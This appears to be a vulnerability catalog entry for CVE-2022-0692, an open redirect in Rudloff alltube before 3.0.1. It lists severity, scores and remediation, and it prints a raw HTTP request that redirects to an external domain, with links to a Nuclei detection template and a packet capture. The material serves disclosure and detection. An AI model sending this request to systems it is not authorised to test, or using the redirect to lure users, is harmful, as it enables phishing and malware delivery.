| Title | Rudloff alltube prior to 3.0.1 - Open Redirect |
|---|---|
| Author | 0x_Akoko |
| Severity | Medium |
| Impact | An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks or the download of malware. |
| Remediation | Upgrade to version 3.0.1 or later to fix the open redirect vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.20834 |
| CVE ID | CVE-2022-0692 |
| CWE ID | CWE-601 |
| Tags | cve cve2022 huntr redirect rudloff alltube alltube_project vuln |
An open redirect vulnerability exists in Rudloff/alltube that could let an attacker construct a URL within the application that causes redirection to an arbitrary external domain via Packagist in versions prior to 3.0.1.
GET /index.php/interact.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/600.1.17 (KHTML, like Gecko) Version/7.1 Safari/537.85.10
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-0692.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-0692.pcap
N/AN/A